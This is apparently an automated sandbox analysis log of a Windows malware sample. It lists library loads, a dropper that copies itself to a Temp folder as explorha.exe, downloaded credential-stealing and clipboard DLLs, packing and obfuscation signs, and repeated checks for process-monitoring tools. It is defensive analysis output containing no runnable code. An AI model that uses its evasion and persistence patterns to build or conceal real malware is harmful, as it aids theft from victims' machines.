Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office Jump to behavior
Source: MejqsB9tx9.exe Static file information: File size 1941504 > 1048576
Source: MejqsB9tx9.exe Static PE information: Raw size of mardldcu is bigger than: 0x100000 < 0x1a7800
Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64[1].dll.3.dr, cred64.dll.3.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Unpacked PE file: 0.2.MejqsB9tx9.exe.c80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mardldcu:EW;ybznsqie:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mardldcu:EW;ybznsqie:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 4.2.explorha.exe.200000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mardldcu:EW;ybznsqie:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mardldcu:EW;ybznsqie:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 17.2.explorha.exe.200000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mardldcu:EW;ybznsqie:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mardldcu:EW;ybznsqie:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 18.2.explorha.exe.200000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mardldcu:EW;ybznsqie:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mardldcu:EW;ybznsqie:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 19.2.explorha.exe.200000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mardldcu:EW;ybznsqie:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mardldcu:EW;ybznsqie:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: clip64.dll.3.dr Static PE information: real checksum: 0x0 should be: 0x1f783
Source: explorha.exe.0.dr Static PE information: real checksum: 0x1e6c24 should be: 0x1e3016
Source: MejqsB9tx9.exe Static PE information: real checksum: 0x1e6c24 should be: 0x1e3016
Source: cred64[1].dll.3.dr Static PE information: real checksum: 0x0 should be: 0x147ee8
Source: clip64[1].dll.3.dr Static PE information: real checksum: 0x0 should be: 0x1f783
Source: cred64.dll.3.dr Static PE information: real checksum: 0x0 should be: 0x147ee8
PE file contains sections with non-standard names
Source: MejqsB9tx9.exe Static PE information: section name:
Source: MejqsB9tx9.exe Static PE information: section name: .idata
Source: MejqsB9tx9.exe Static PE information: section name:
Source: MejqsB9tx9.exe Static PE information: section name: mardldcu
Source: MejqsB9tx9.exe Static PE information: section name: ybznsqie
Source: MejqsB9tx9.exe Static PE information: section name: .taggant
Source: explorha.exe.0.dr Static PE information: section name:
Source: explorha.exe.0.dr Static PE information: section name: .idata
Source: explorha.exe.0.dr Static PE information: section name:
Source: explorha.exe.0.dr Static PE information: section name: mardldcu
Source: explorha.exe.0.dr Static PE information: section name: ybznsqie
Source: explorha.exe.0.dr Static PE information: section name: .taggant
Source: cred64[1].dll.3.dr Static PE information: section name: _RDATA
Source: cred64.dll.3.dr Static PE information: section name: _RDATA
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD243B00BD pushad ; iretd 14_2_00007FFD243B00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD243B0942 push E95639D0h; ret 14_2_00007FFD243B09C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD24480DE0 push ebp; ret 14_2_00007FFD24480E9A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD24480E7D push ebp; ret 14_2_00007FFD24480E9A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD2448183D pushad ; ret 14_2_00007FFD244818CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD244818D1 pushad ; ret 14_2_00007FFD244818CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD244829D9 push eax; ret 14_2_00007FFD244829FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD2448324D pushad ; ret 14_2_00007FFD24483272
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD244869ED push eax; retf 14_2_00007FFD24486A79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD244812AD push ebx; ret 14_2_00007FFD2448133A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD2448CAA8 push 140000C9h; retf 0000h 14_2_00007FFD2448CAB1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD2448CACC push eax; retf 0000h 14_2_00007FFD2448CAD5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD24481A71 push edx; ret 14_2_00007FFD24481A92
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD24481B25 push esi; ret 14_2_00007FFD24481B42
Source: MejqsB9tx9.exe Static PE information: section name: entropy: 7.98156159915206
Source: MejqsB9tx9.exe Static PE information: section name: mardldcu entropy: 7.952255318484778
Source: explorha.exe.0.dr Static PE information: section name: entropy: 7.98156159915206
Source: explorha.exe.0.dr Static PE information: section name: mardldcu entropy: 7.952255318484778
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\clip64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\cred64[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\MejqsB9tx9.exe File created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass
